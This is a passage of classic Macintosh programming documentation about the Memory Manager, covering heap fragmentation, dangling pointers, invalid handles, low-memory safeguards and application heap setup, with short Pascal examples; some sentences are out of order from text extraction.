The Memory Manager reserves memory for a nonrelocatable block by moving unlocked relocatable blocks upward until it has created a space large enough for the new block. Figure 1-11 illustrates how the Memory Manager allocates nonrelocatable blocks. and it has successfully prevented heap fragmentation. it instead reserves space for the block as close to the bottom of the heap as possible and then puts the block into that reserved space. no nonrelocatable block can trap a relocatable block. Although it could place a block of the requested size at the top of the heap. Figure 1-11. When the Memory Manager can successfully pack all nonrelocatable blocks into the bottom of the heap. it attempts to reserve memory for them as low in the heap as possible. When it allocates new nonrelocatable blocks. Allocating a nonrelocatable block 113 .Figure 1-10 Purging and reallocating a relocatable block Memory Reservation The Memory Manager does its best to prevent situations in which nonrelocatable blocks in the middle of the heap trap relocatable blocks. the Memory Manager might even move a relocatable block over a nonrelocatable block to make room for another nonrelocatable block. During this process.

manually reserve space for the block by calling the ReserveMem procedure. It purges a block by deallocating it and setting its master pointer to NIL. Heap Fragmentation Heap fragmentation can slow your application by forcing the Memory Manager to compact or purge your heap to satisfy a memory-allocation request. you can manually purge a few blocks or an entire heap in anticipation of a memory shortage. the Memory Manager sequentially purges unlocked. relocatable blocks. 114 . call the PurgeMem procedure or the MaxMem function. the Memory Manager might need to compact or purge the heap to free memory and to fuse many small free blocks into fewer large free blocks. the Memory Manager looks for space big enough for the block as low in the heap as possible. you can. If you do not. when your heap is severely fragmented by locked or nonrelocatable blocks. call the EmptyHandle procedure. To purge an individual block manually. by calling either the NewPtr or NewHandle function). relocatable blocks down until they reach nonrelocatable blocks or locked. by calling either the CompactMem function or the MaxMem function. For example. In the worst cases. The Memory Manager first tries to obtain the requested amount of space by compacting the heap. Heap Purging and Compaction When your application attempts to allocate memory (for example. You can compact the heap manually. the Memory Manager moves unlocked. To purge your entire heap manually.When allocating a new relocatable block. When compacting the heap. the Memory Manager then purges the heap. purgeable relocatable blocks until it has freed enough memory or until it has purged all such blocks. if you want. even though that much space is actually free in your heap. but it does not create space near the bottom of the heap for the block if there is already enough space higher in the heap. it might be impossible for the Memory Manager to find the requested amount of contiguous free space. If you want. if compaction fails to free the required amount of space. This can have disastrous consequences for your application. In a purge of the heap.

you can follow a few simple rules to minimize it. the new block would take the place of the relocatable block. If you were later to allocate a nonrelocatable block as large as or smaller than the gap. small gaps are inefficient because of the small likelihood that future memory allocations will create blocks small enough to occupy the gaps. Thus. fragmentation does not strike your application's heap by chance. Whenever you dispose of a nonrelocatable block that you have allocated. leaving a small gap. relocatable blocks upward over nonrelocatable blocks to make room for the new block as low in the heap as possible. you should keep in mind the following rule: the Memory Manager can move a relocatable block around a nonrelocatable block (or a locked relocatable block) at these times only: • When the Memory Manager reserves memory for a nonrelocatable block (or when you manually reserve memory before allocating a block). The problem occurs when you dispose of a nonrelocatable block in the middle of the pile of nonrelocatable blocks at the bottom of the heap. thus creating "roadblocks" for the Memory Manager when it rearranges the heap to maximize the amount of contiguous free space. the Memory Manager can move that block around other blocks if necessary. When you attempt to resize a relocatable block. If you later allocate a slightly smaller.if the Memory Manager cannot find enough room to load a required code segment. which would join other relocatable blocks in the middle of the heap. The primary causes of heap fragmentation are indiscriminate use of nonrelocatable blocks and indiscriminate locking of relocatable blocks. that gap shrinks. it can move unlocked. nonrelocatable block. Each of these creates immovable blocks in your heap. Once you understand the major causes of heap fragmentation. you should try to avoid disposing of and then reallocating nonrelocatable blocks during program execution. you create small gaps. as desired. • In contrast. Deallocating Nonrelocatable Blocks One of the most common causes of heap fragmentation is also one of the most difficult to avoid. 115 . You can significantly reduce heap fragmentation simply by exercising care when you allocate nonrelocatable blocks and when you lock relocatable blocks. the new nonrelocatable block might be smaller than the original nonrelocatable block. there is little that you can do to prevent heap fragmentation. Throughout this section. it is best to minimize the amount of fragmentation that occurs in your application heap. Obviously. However. The Memory Manager would place the block in the gap if possible. It might be tempting to think that because the Memory Manager controls the movement of blocks in the heap. the Memory Manager cannot move relocatable blocks over nonrelocatable blocks during compaction of the heap. Unless you immediately allocate another nonrelocatable block of the same size. however. unless the next nonrelocatable block you allocate happens to be the same size as the disposed block. However. These small gaps can lead to heavy fragmentation over the course of your application's execution. your application will crash. It would not matter if the first block you allocated after deleting the nonrelocatable block were relocatable. In reality. you create a gap where the nonrelocatable block used to be.

Occasionally. (You can also manually reserve memory for relocatable blocks. a process designed to prevent it. Ordinarily. Figure 1-12. however. This has the effect of partitioning the heap into four areas. just as deleting a nonrelocatable block can. One solution is to reserve memory for all relocatable blocks that might at some point need to be locked. or when it fails and causes a nonrelocatable block to be allocated in the middle of the heap. a nonrelocatable block. In this case. Deleting a locked relocatable block can create a gap. Above those blocks are the unlocked relocatable blocks.) However. they can cause as much heap fragmentation as nonrelocatable blocks. except during the times described previously. as illustrated in Figure 1-12. An effectively partitioned heap 116 . however. memory reservation can cause fragmentation. As a result. the Memory Manager allocates the new nonrelocatable block above the relocatable block. and to leave them locked for as long as they are allocated. Between the locked relocatable blocks and the unlocked relocatable blocks is an area of free space. This solution has drawbacks. Memory reservation can also fragment the heap if there is not enough space in the heap to move the relocatable block up. when the Memory Manager moves a block up during memory reservation. The MoveHHi procedure allows you to move a relocatable block upward until it reaches the top of the heap. memory reservation ensures that allocating nonrelocatable blocks in the middle of your application's execution causes no problems. because then the blocks would lose any flexibility that being relocatable otherwise gives them. but you rarely need to do so. or a locked relocatable block. The relocatable block cannot then move over the nonrelocatable block. that block cannot overlap its previous location. Locking Relocatable Blocks Locked relocatable blocks present a special problem. At the bottom of the heap are the nonrelocatable blocks. The principal idea behind moving relocatable blocks to the top of the heap and locking them there is to keep the contiguous free space as large as possible. At the top of the heap are locked relocatable blocks. the Memory Manager might need to move the relocatable block up more than is necessary to contain the new nonrelocatable block.Reserving Memory Another cause of heap fragmentation ironically occurs because of a limitation of memory reservation. Memory reservation never makes fragmentation worse than it would be if there were no memory reservation. When relocatable blocks are locked. thereby creating a gap between the top of the new block and the bottom of the relocated block. An alternative partial solution is to move relocatable blocks to the top of the heap before locking them. The Memory Manager uses memory reservation to create space for nonrelocatable blocks as low as possible in the heap. either when it succeeds but leaves small gaps in the reserved space.

then lock it for the duration of your application's execution (or as long as the block remains allocated). Even if MoveHHi succeeds in moving a block to the top area of the heap. When moving a block to the top area. even if you never dispose of nonrelocatable blocks until your application terminates. Whenever the Memory Manager compacts the heap or moves another relocatable block to the top heap area. if you also dispose of nonrelocatable blocks in the middle of your application's execution. in that order. it brings all unlocked relocatable blocks at the bottom of that partition back into the middle area. however. and the Memory Manager could occasionally place new nonrelocatable blocks above relocatable blocks. Unlike NewPtr and ReserveMem. there are two reasons for not allocating nonrelocatable blocks during the middle of your application's execution. In practice. A relocatable block that is locked at the top area of the heap for a long period of time could trap other relocatable blocks that were locked for short periods of time but then unlocked. Do not reserve memory for relocatable blocks you plan to allocate for only short periods of time. unlocking or deleting locked blocks can cause fragmentation if you don't unlock or delete those blocks beginning with the lowest locked block. you don't need to move them manually back into the middle area when you unlock them. you apply the same rules to relocatable blocks that you reserve space for and leave permanently locked as you apply to nonrelocatable blocks: Try not to allocate such blocks in the middle of your application's execution. as discussed earlier. and don't dispose of and reallocate such blocks in the middle of your application's execution. Instead. be sure to call MoveHHi on the block and then lock the block. not always a perfect solution to handling relocatable blocks that need to be locked. This suggests that you need to treat relocatable blocks locked for a long period of time differently from those locked for a short period of time. then allocation of new nonrelocatable blocks is likely to create small gaps. MoveHHi does not currently move a relocatable block around one that is not relocatable. move them to the top of the heap (by calling MoveHHi) and then lock them. The MoveHHi procedure moves a block upward only until it reaches either a nonrelocatable block or a locked relocatable block. Allocating Nonrelocatable Blocks As you have seen. memory reservation is an imperfect process. First.Using MoveHHi is. 117 . you should reserve memory for it at the bottom of the heap before allocating it. If you plan to lock a relocatable block for a long period of time. Second. After you lock relocatable blocks temporarily.

When the block no longer needs to be locked. When allocating relocatable blocks that you need to lock for long periods of time. use the MoveHHi procedure to move the block to the top of the heap and then lock it. If you plan to lock a relocatable block for a short period of time and allocate nonrelocatable blocks while it is locked. Some Toolbox routines require you to use nonrelocatable blocks. If between the times that you allocate and dispose of a nonrelocatable block. If you know how many nonrelocatable blocks of a certain size your application is likely to need. Try to anticipate the maximum number of nonrelocatable blocks you will need and allocate them at the beginning of your application's execution. It simply requires that you follow a few rules as closely as possible.There is. or if you want to use a dereferenced handle to the relocatable block at interrupt time. For efficiency. Sometimes you need to allocate a nonrelocatable block only temporarily. through its handle instead of through its master pointer. call the MaxApplZone procedure once and the MoreMasters procedure enough times so that the Memory Manager never needs to call it for you. an exception to the rule that you should not allocate nonrelocatable blocks in the middle of your application's execution. Summary of Preventing Fragmentation Avoiding heap fragmentation is not difficult. you might sometimes want to 118 . you can add that many to the beginning of the list at the beginning of your application's execution. • • • • • Perhaps the most difficult restriction is to avoid disposing of and then reallocating nonrelocatable blocks in the middle of your application's execution. If you adhere to the following rules. then you have done no harm. because the Memory Manager does not move relocatable blocks around nonrelocatable blocks when you call MoveHHi or when it attempts to compact the heap. requires an extra memory reference. Avoid disposing of and then reallocating nonrelocatable blocks during your application's execution. Remember that allocation of even a small nonrelocatable block in the middle of your heap can ruin a scheme to prevent fragmentation of the heap. and it is not always easy to anticipate how many such blocks you will need. you might want to place used blocks into a linked list of free blocks instead of disposing of them. Remember that you need to lock a relocatable block only if you call a routine that could move or purge memory and you then use a dereferenced handle to the relocatable block. If you must allocate and dispose of blocks in the middle of your program's execution. The temporary block cannot create a new gap because the Memory Manager places no other block over the temporary block. use the ReserveMem procedure to reserve memory for them as close to the bottom of the heap as possible. Dangling Pointers Accessing a relocatable block by double indirection. If you need a nonrelocatable block later. however. you are likely to avoid significant heap fragmentation: • At the beginning of your application's execution. unlock it. and lock the blocks immediately after allocating them. you can check the linked list for a block of the exact size instead of simply calling the NewPtr function. you allocate no additional nonrelocatable blocks and do not attempt to compact the heap.

Listing 1-1. In that event. Unfortunately. the master pointer is guaranteed always to point to the beginning of the block's data. it is often easy during debugging to overlook situations that could leave pointers dangling. Locking a block to avoid dangling pointers VAR origState: SignedByte. Compiler Dereferencing Some of the most difficult dangling pointers to isolate are not caused by any explicit dereferencing on your part. Any operation that allocates space from the heap might cause the relocatable block to be moved or purged. that code might still work properly most of the time. you need to be particularly careful. If. if the code between the BEGIN and END statements causes the Memory Manager to move or purge memory. they can be very difficult to trace.{get handle attributes} MoveHHi(Handle(myData)). When you do this. however. make a copy of the block's master pointer--and then use that pointer to access the block by single indirection. This section describes a number of situations that can cause dangling pointers and suggests some ways to avoid them. END. suppose you use a handle called myHandle to access the fields of a record in a relocatable block. you are likely to end up with a dangling pointer.. A compiler is likely to dereference myHandle so that it can access the fields of the record without double indirection. {original attributes of handle} origState := HGetState(Handle(myData)). For example. because pointers dangle only if the relocatable blocks that they reference actually move. however. Routines that can move or purge memory do not necessarily do so unless memory space is tight. You might use Pascal's WITH statement to do so. if you improperly dereference a handle in a section of code. HLock(Handle(myData)). Dangling pointers are likely to make your application crash or produce garbled output. the block's master pointer is correctly updated. As a result. The easiest way to prevent dangling pointers is simply to lock the relocatable block whose data you want to read or write. Thus.. However. Listing 1-1 illustrates one way to avoid dangling pointers by locking a relocatable block. as follows: WITH myHandle^^ DO BEGIN . Because the block is locked and cannot move. but your copy of the master pointer is not. a dangling pointer does cause errors. WITH myData^^ DO {move the handle high} {lock the handle} {fill in window data} 119 . your copy of the master pointer is a dangling pointer. but by implicit dereferencing on the part of the compiler.dereference the handle--that is.

in other ways. and then use a copy of the original master pointer after calling a routine that could move or purge memory. Passing fields of records as arguments to routines that might move or purge memory can cause similar problems. fileRefNum := 0. A compiler can generate hidden dereferencing. Such problems are particularly common in code that manipulates linked data structures. hTE). or use a temporary variable to allocate the new handle. hScroll := GetNewControl(rHScroll. Pascal conventions call for all arguments larger than 4 bytes to be passed by reference. directly or indirectly. a variable is also passed by reference when the routine called requests a variable parameter. the handle myData is never explicitly unlocked. Problems arise only when you pass a field by reference rather than by value.contrlRect). myWindow). In Listing 1-1. This can cause problems because your compiler could dereference myHandle before calling NewHandle. You should be careful to lock blocks only when necessary. HSetState (origState). you should unlock the handle. For example. myWindow). You should lock a handle only if you dereference it. myHandle^^.BEGIN editRec := TENew(gDestRect. 120 . windowDirty := FALSE. vScroll := GetNewControl(rVScroll. {reset handle attributes} The handle myData needs to be locked before the WITH statement because the functions TENew and GetNewControl allocate memory and hence might move the block whose handle is myData. by assigning the result of a function that might move or purge blocks to a field in a record referenced by a handle. gViewRect). InvalRect(theControl^^.nextHandle := tempHandle. Instead. and hence potential dangling pointers. In Pascal. for instance. if the records are in relocatable blocks referred to with handles. you should either lock myHandle before performing the allocation. Therefore. because locked relocatable blocks can increase heap fragmentation and slow down your application unnecessarily. the original attributes of the handle are saved by calling HGetState and later are restored by calling HSetState.nextHandle := NewHandle(sizeof(myLinkedElement)). Both of the following lines of code could leave a pointer dangling: TEUpdate(hTE^^. This strategy is preferable to just calling HLock and HUnlock. When you no longer need to reference the block with the master pointer. you might use this code to allocate a new element of a linked list: myHandle^^. END. as in the following code: tempHandle := NewHandle(sizeof(myLinkedElement)).viewRect.

ManipulateData(myHandle^).. Callback Routines Code segmentation can also lead to a different type of dangling-pointer problem when you use callback routines. the dereferenced handle would dangle.. nonresident code segment. but it is difficult to debug. or when assigning the result of a function in the same code segment to such a field. If the Segment Manager must allocate a new relocatable block for the segment containing ManipulateData. . suppose you call an application-defined procedure ManipulateData. 121 . PROCEDURE MyRoutine. then the compiler would take the address from the jump table entry for MyCallBack. END. Either way. Ordinarily.. As before. then you could indirectly cause a pointer to dangle. BEGIN . The problem rarely arises.These problems occur because a compiler may dereference a handle before calling the routine to which you pass the handle. it does not matter whether the procedure you pass in such a variable is in the same code segment as the routine that calls it or in a different code segment. then a compiler would pass to TrackControl the absolute address of the MyCallBack procedure. which manipulates some data at an address passed to it in a variable parameter. it might move myHandle to do so. Some Toolbox routines require that you pass a pointer to a procedure in a variable of type ProcPtr. You can create a dangling pointer if ManipulateData and MyRoutine are in different segments. For example. myEvent. TrackControl should call MyCallBack correctly.. Then. Loading Code Segments If you call an application-defined routine located in a code segment that is not currently in RAM. You need to be careful even when passing a field in a record referenced by a handle to a routine in the same code segment as the caller. thus jeopardizing any dereferenced handles you might be using. If it were in a different code segment.where. you can solve these problems by locking the handles or using temporary variables. A similar problem can occur if you assign the result of a function in a nonresident code segment to a field in a record referred to by a handle. @MyCallBack). which might then be invalid. If that routine could call a Toolbox routine that might move or purge memory. or call a routine in a different. If so. For example. You can do this because you've passed a dereferenced copy of myHandle as an argument to ManipulateData. suppose you call TrackControl as follows: myPart := TrackControl(myControl. If MyCallBack were in the same code segment as this line of code. the Segment Manager might need to move memory when loading that code segment. and the segment containing ManipulateData is not loaded when MyRoutine is executed. that routine may move memory before it uses the dereferenced handle.

If you subsequently attempt to operate on such a block. Suppose. or it could become part of a linked list of unused master pointers maintained by the Memory Manager. further. that myProc is a global variable. be difficult to trace the cause of the garbled data. Invalid Handles An invalid handle refers to the wrong area of memory. myProc). however. and the first line of the code is in a different segment from the call to TrackControl. you will get garbled data. Suppose. in this hypothetical situation. (The master pointer might belong to a subsequently allocated relocatable block. myProc would reference MyCallBack incorrectly. not an absolute address.where.) If you accidentally use a handle to a block you have already disposed of. however. you can test whether the value of the handle is 122 . . Instead. the Memory Manager will probably generate a nilHandleErr result code. When you dispose of a relocatable block (perhaps by calling the procedure DisposeHandle). In the worst cases. It might. myEvent.. the compiler might place the absolute address of the MyCallBack routine into the variable myProc. By doing so.. The compiler cannot realize that you plan to use the variable in a different code segment from the one that holds both the routine you are referencing and the routine you are using to initialize the myProc variable. If you want to make certain that a handle is not disposed of before operating on a relocatable block. and fake handles. Then. your application will crash. Disposed Handles: A disposed handle is a handle whose associated relocatable block has been disposed of. and thus to avoid. make sure to place in the same segment any code in which you assign a value to a variable of type ProcPtr and any code in which you use that variable. To avoid this problem. You must avoid empty. or fake handles as carefully as dangling pointers. the contents of the master pointer are no longer defined. Because MyCallBack and the call to TrackControl are in different code segments. the TrackControl procedure requires that you pass an address in the jump table. the Memory Manager does not change the value of any handle variables that previously referenced that block. There are three types of invalid handles: empty handles. invalid handles. If you must put them in different code segments. Here is an example: myProc := @MyCallBack. just as a dangling pointer does. myPart := TrackControl(myControl. then be sure that you place the callback routine in a code segment different from the one that initializes the variable. that the MyCallBack procedure is in the same segment as the first line of the code (which is in a different segment from the call to TrackControl). it is generally easier to detect. disposed. Fortunately. Because the block has been disposed of. you can obtain unexpected results. Thus. As long as these lines of code are in the same code segment and the segment is not unloaded between the execution of those lines. because your application can continue to run for quite a while before the problem begins to manifest itself. In the best cases. You can avoid these problems quite easily by assigning the value NIL to the handle variable after you dispose of its associated block.Occasionally. those variables still hold the address of what once was the relocatable block's master pointer. disposed handles. however. you might use a variable of type ProcPtr to hold the address of a callback procedure and then pass that address to a routine. the preceding code should work perfectly. you indicate that the handle does not point anywhere in particular.

.. you can use the following code to determine whether a handle both points to a valid master pointer and references a nonempty relocatable block: IF myHandle <> NIL THEN IF myHandle^ <> NIL THEN . Most compilers.. This is useful. inadvertently using an empty handle can give unexpected results or lead to a system crash. Assuming you set handles to NIL when you dispose of them. so we can operate on it here} Empty Handles: An empty handle is a handle whose master pointer has the value NIL. if your compiler uses the operator & as a short-circuit operator for AND. For example. Listing 1-2. Fake Handles: A fake handle is a handle that was not created by the Memory Manager. When the Memory Manager purges a relocatable block. however. This is useful. you reference whatever data is found at that location. This causes the Operating System to crash immediately if you attempt to dereference an empty handle.. however. You can check for empty handles much as you check for disposed handles. it sets the block's master pointer to NIL. It is useful during debugging to set memory location 0 to an odd number. If you doubly dereference an empty handle. Once again. you create handles by either directly or indirectly calling the Memory Manager function NewHandle (or one of its variants.. you could rewrite the preceding code like this: IF (myHandle <> NIL) & (myHandle^ <> NIL) THEN . for example. The space occupied by the master pointer itself remains allocated. and handles to the purged block continue to point to the master pointer. Normally.. the second expression is evaluated only if the first expression evaluates to TRUE. Creating a fake handle FUNCTION MakeFakeHandle: Handle. allow you to use "short-circuit" Boolean operators to minimize the evaluation of expressions. you need two IF-THEN statements rather than one compound statement in case the value of the handle itself is NIL. NIL technically refers to memory location 0. such as NewHandleClear). {we can operate on the relocatable block here} In this case. as follows: IF myHandle <> NIL THEN . because if you later reallocate space for the block by calling ReallocateHandle. {we can operate on the relocatable block here} Note that because Pascal evaluates expressions completely. as illustrated in Listing 1-2.. {handle is valid. because you can immediately fix problems that might otherwise require extensive debugging. {DON'T USE THIS FUNCTION!} 123 . such as $50FFC001. But this memory location holds a value. the master pointer will be updated and all existing handles will correctly access the reallocated block. and you could obtain unexpected results that are difficult to trace.NIL. In the Macintosh Operating System. You create a fake handle--usually inadvertently--by directly assigning a value to a variable of type Handle.

END. myHandle. however. attempt to copy the data in an existing record (myRecord) into a new handle. MoveHHi copies invalid data. VAR myHandle: myPointer: BEGIN myPointer := Ptr(kMemoryLoc). Because. as follows: myErr := PtrToHand(@myRecord. it's unlikely that MoveHHi would ever get that far. supposedly. The fake handle manufactured by the function MakeFakeHandle in Listing 1-2 contains an address that may or may not be the address of a master pointer. SizeOf(myRecord)).) Not all fake handles are as easy to spot as those created by the MakeFakeHandle function defined in Listing 1-2. a master pointer. the value of a fake handle probably isn't the address of a master pointer. (Actually. For example. probably it would run into problems when attempting to determine the size of the original block from the block header. Ptr. MoveHHi is likely to copy the data from the original block to the new block by dereferencing the handle and using. A correct way to create a new handle to some existing data is to make a copy of the data using the PtrToHand function. MakeFakeHandle := myHandle. as follows: myHandle := NewHandle(SizeOf(myRecord)). it overwrites the master pointer with the address of that record. {DON'T DO THIS!} {the address of some memory} {the address of a pointer} Handle.CONST kMemoryLoc = $100. suppose you pass a fake handle to the MoveHHi procedure. If it isn't the address of a master pointer. then you virtually guarantee chaotic results if you pass the fake handle to a system software routine that expects a real handle. After allocating a new relocatable block high in the heap. making myHandle a fake handle. {a random memory location} The second line of code does not make myHandle a handle to the beginning of the myRecord record. You might.and handle-manipulation routines that can help you avoid creating fake handles. {create a new handle} myHandle^ := @myRecord. The Memory Manager provides a set of pointer. for instance. Instead. Remember that a real handle contains the address of a master pointer. Low-Memory Conditions 124 . myHandle := @myPointer.

you call GetNewDialog. Instead of relying on just the free memory of a memory cushion. you give the Memory Manager the freedom to release that space if heap memory becomes low. The free memory defined by that threshold is your memory cushion. Memory Reserves Unfortunately. For example. the result is usually a system crash. You also generally need a larger cushion (about 70 KB) when printing. you should never deplete the available heap memory to the point that it becomes impossible to load required code segments. some additional emergency storage that you release when free memory becomes low. You also need to make sure that indirect memory allocation doesn't cut into the memory cushion. there are times when you might need to use some of the memory in the cushion yourself. The execution of some system software routines requires significant amounts of memory in your heap. For example. to dip into the memory cushion. it also needs to allocate heap space for the dialog item list and any other custom items in the dialog. your application will crash if the Segment Manager is called to load a required code segment and there is not enough contiguous free memory to allocate a block of the appropriate size. however. The 125 . that you don't deplete the available heap memory. some QuickDraw operations on regions can temporarily allocate fairly large amounts of space in your heap. It is better. Experience has shown that 40 KB is a reasonably safe size for this memory cushion. for example. You should not simply inspect the handle or pointer returned to you and make sure that its value isn't NIL. you can mark as purgeable any relocatable blocks whose contents could easily be reconstructed. you should check that. If you can consistently maintain that amount of space free in your heap. do little or no checking to see that your heap contains the required amount of free space. you can be reasonably certain that system software routines will get the memory they need to operate. if necessary. When. You can also help maximize the available heap memory by intelligently segmenting your application's executable code and by periodically unloading any unneeded segments. The standard way to do this is to unload every nonessential segment at the end of your application's main event loop. By making a block purgeable. Memory Cushions: These two measures--making blocks purgeable and unloading segments--help you only by releasing blocks that have already been allocated. For example. the Dialog Manager might need to allocate space for a dialog record. to save a user's document than to reject the request to save the document. for instance. therefore. Before calling GetNewDialog. the remaining amount of space free in the heap would not fall below a certain threshold. You can avoid these problems by making sure that there is always enough space in your heap to handle these hidden memory allocations. if the requested amount of memory were in fact allocated. In either case. before you attempt to allocate memory directly. It is even more important to make sure.It is particularly important to make sure that the amount of free space in your application heap never gets too low. Some of these system software routines. because you might have succeeded in allocating the space you requested but left the amount of free space dangerously low. They either assume that they will get whatever memory they need or they simply issue a system error when they don't get the needed memory. As you have seen. Some actions your application performs should not be rejectable simply because they require it to reduce the amount of free space below a desired minimum. You can take several steps to help maximize the amount of free space in your heap. you can allocate a memory reserve. you need to make sure that the amount of space left free after the call is greater than your memory cushion. Before you call NewHandle or NewPtr.

If there is still insufficient memory.important difference between this memory reserve and the memory cushion is that the memory reserve is a block of allocated memory. this section shows how you can • • • • set up your application heap at application launch time determine how much free space is available in your application heap allocate and release blocks of memory in your heap define and install a grow-zone function The techniques described in this section are designed to minimize fragmentation of your application heap and to ensure that your application always has sufficient memory to complete any essential operations. the release itself of the memory reserve should not be a cause for alarm. If the amount it releases at any time is not enough. In particular. The Memory Manager calls your heap's grow-zone function only after other techniques of freeing memory to satisfy a memory request fail (that is. The Process Manager then loads code segments into memory and sets up the stack. This mechanism allows your grow-zone function to release just a little bit of memory at a time. That emergency memory reserve might provide enough memory to compensate for any essential tasks that you fail to anticipate. As the most drastic step to freeing memory in your heap. it calls the Memory Manager to create and initialize a memory partition for your application. Ideally. and A5 world (including the jump table) for your application. The grow-zone function can then take appropriate steps to free additional memory. heap. Because you allow essential tasks to dip into the memory cushion. the Memory Manager calls it again and gives it the opportunity to take more drastic measures. When the function returns. which you release whenever you detect that essential tasks have dipped into the memory cushion. A grow-zone function might dispose of some blocks or make some unpurgeable blocks purgeable. Grow-Zone Functions The Memory Manager provides a particularly easy way for you to make sure that the emergency memory reserve is released when necessary. Using Memory This section describes how you can use the Memory Manager to perform the most typical memory management tasks. however. You can define a grow-zone function that is associated with your application heap. after compacting and purging the heap and extending the heap zone to its maximum size). Setting Up the Application Heap When the Process Manager launches your application. the application should never actually deplete the memory cushion and use the memory reserve. 126 . the Memory Manager once again purges and compacts the heap and tries to reallocate memory. your application releases the memory reserve as a precautionary measure during ordinary operation. you can release the emergency reserve. Using this scheme. the Memory Manager calls the grow-zone function again (but only if the function returned a nonzero value the previous time it was called).

because future versions of system software might increase the default amount of space allocated for the stack. If your application does not depend on recursion. By lowering ApplLimit. you should do this only if you encounter system error 28 during testing. For these applications. If you are using one of these languages. you might want to • • • change the size of your application's stack expand the heap to the heap limit allocate additional master pointer blocks The following sections describe in detail how and when to perform these operations. If you never encounter system error 28 (generated by the stack sniffer when it detects a collision between the stack and the heap) during application testing. you should also perform some setup of your own early in your application's execution. because each time a routine calls itself.) You should never decrease the size of the stack. stack usage usually reaches a maximum in some heavily nested routine. technically you are not making the stack bigger. Changing the Size of the Stack: Most applications allocate space on their stack in a predictable way and do not need to monitor stack space during their execution. some object-oriented languages (for example. which can require up to 256 bytes of stack space. If your application does depend on recursion. Listing 1-3 defines a procedure that increases the stack size by a given value. rely heavily on recursive programming techniques. the stack can grow to 8 KB on Macintosh computers without Color QuickDraw and to 32 KB on computers with Color QuickDraw. If you must modify the size of the stack. To increase the size of your stack. subtracting the value of the extraBytes parameter from that value. however. For the same reason. you might consider expanding the stack so that your application can perform deeply nested recursive computations. (The size of the stack for a faceless background process is always 8 KB. It does so by determining the current heap limit. you should not set the stack to a predetermined absolute size or calculate a new absolute size for the stack based on the microprocessor's type. a new copy of that routine's parameters and variables is appended to the stack. You can help prevent your application from crashing because of insufficient stack space by expanding the size of your stack. By default. 127 . Some applications. you simply reduce the size of your heap. C++) allocate space for objects on the stack. then you probably do not need to increase the size of your stack. you should increase the stack size only by some relative amount that is sufficient to meet the increased stack requirements of your application. Depending on the needs of your application. you are just preventing collisions between it and the heap. The problem can become particularly acute if one or more of the local variables is a string.To help prevent heap fragmentation. you might need to expand your stack. In these applications. There is no maximum size to which the stack can grow. then to avoid collisions between your stack and heap you simply need to ensure that your stack is large enough to accommodate that size. whether Color QuickDraw is present or not. Because the heap cannot grow above the boundary contained in the ApplLimit global variable. If the stack in your application can never grow beyond a certain size. and then setting the application limit to the difference. even routines with just a few local variables can cause stack overflow. in which one routine repeatedly calls itself or a small group of routines repeatedly call each other. In addition. you can lower the value of ApplLimit to limit the heap's growth.

Another advantage to calling MaxApplZone is that doing so is likely to reduce the number of relocatable blocks that are purged by the Memory Manager. you can prevent the Memory Manager from purging blocks that it otherwise would purge. By expanding the heap to its limit. because the SetApplLimit procedure cannot change the ApplLimit global variable to a value lower than the current top of the heap. it has no effect. Expanding the Heap: Near the beginning of your application's execution. the Memory Manager gradually expands your heap as memory needs require. To prevent this fragmentation. can make memory allocation significantly faster. before you allocate any memory. First. you should call the MaxApplZone procedure to expand the application heap immediately to the application heap limit. they are no longer at the top of the heap. BEGIN SetApplLimit(Ptr(ORD4(GetApplLimit) . The Operating System allocates one block of master pointers as your application is loaded into memory. Your heap then remains fragmented for as long as those blocks remain locked. Allocating Master Pointer Blocks After calling MaxApplZone. At any time the Memory Manager is forced to call MoreMasters for you. When the heap grows beyond those locked blocks. The Memory Manager expands your heap to fulfill a memory request only after it has exhausted other methods of obtaining the required amount of space. END. Second. when you allocate a relocatable block. When your application first starts running. This increases heap fragmentation. Increasing the amount of space allocated for the stack PROCEDURE IncreaseStackSize (extraBytes: Size).extraBytes)). you should try to prevent the Memory Manager from calling MoreMasters for you. This. there are already at least 64 relocatable blocks allocated in your heap. the Memory Manager automatically allocates a new block of master pointers.Listing 1-3. Each block of master pointers in your application heap contains 64 master pointers. This gradual expansion can result in significant heap fragmentation if you have previously moved relocatable blocks to the top of the heap (by calling MoveHHi) and locked them (by calling HLock). the new nonrelocatable block of master pointers is likely to fragment your application heap. If. before you call the MaxApplZone procedure (as described in the next section). and every relocatable block you allocate needs one master pointer to reference it. For several reasons. If you do not do this. including compacting the heap and purging blocks marked as purgeable. you should call the MoreMasters procedure to allocate as many new nonrelocatable blocks of master pointers as your application is likely to need during its execution. Unless all or most of those blocks are locked high in the heap (an unlikely situation). there are no unused master pointers in your application heap. there are no such blocks that might have to be moved. however. If you call IncreaseStackSize after you call MaxApplZone. MoreMasters executes more slowly if it has to move relocatable blocks up in the heap to make room for the new nonrelocatable block of master pointers. For 128 . the new nonrelocatable block of master pointers might be allocated above existing relocatable blocks. you should call MoreMasters at the beginning of your application enough times to ensure that the Memory Manager never needs to call it for you. together with the fact that your heap is expanded only once. You should call this procedure at the beginning of your application.

Because of Memory Manager size corrections. 129 {64 more master ptrs} {increase stack size} {extend heap to limit} Integer. CONST kExtraStackSpace = $8000. Then. you should also count any nonrelocatable blocks of size $108.) Finally. find out from your debugger how many times the system called MoreMasters. To do so. count the nonrelocatable blocks of size $100 bytes (decimal 256. FOR count := 1 TO kMoreMasterCalls DO MoreMasters. you cannot usually honor every user request that would require your application to allocate memory. call MoreMasters at least that many times at the beginning of your application. kMoreMasterCalls = 5. For example. then five calls to the MoreMasters should be enough. dialog boxes. This is because MoreMasters allocates a nonrelocatable block. you should call MoreMasters enough times at the beginning of the program to cover the larger figure. thereby increasing fragmentation. VAR count: BEGIN IncreaseStackSize(kExtraStackSpace). you should call DoSetUpHeap in a code segment that you never unload (possibly the main segment) rather than in a special initialization code segment. opening and closing windows. Listing 1-4 illustrates a typical sequence of steps to configure your application heap and stack. the new master pointer block is located above the purged space. First. You can determine empirically how many times to call MoreMasters by using a low-level debugger. END. and allocates five additional blocks of master pointers. so if your application usually allocates about 100 relocatable blocks but sometimes might allocate 1000 in a particularly busy session.example. It's better to call MoreMasters too many times than too few. (You should also check to make sure that your application doesn't allocate other nonrelocatable blocks of those sizes. To reduce heap fragmentation. {32 KB} {for 320 master ptrs} . $10C. Listing 1-4. every time the user opens a new window. MaxApplZone. if your application never allocates more than 300 relocatable blocks in its heap. subtract the number it allocates from the total. If it does. If you call MoreMasters from a code segment that is later purged. or $110 bytes. remove all the calls to MoreMasters from your code and then give your application a rigorous workout. or 64 4). Setting up your application heap and stack PROCEDURE DoSetUpHeap. Determining the Amount of Free 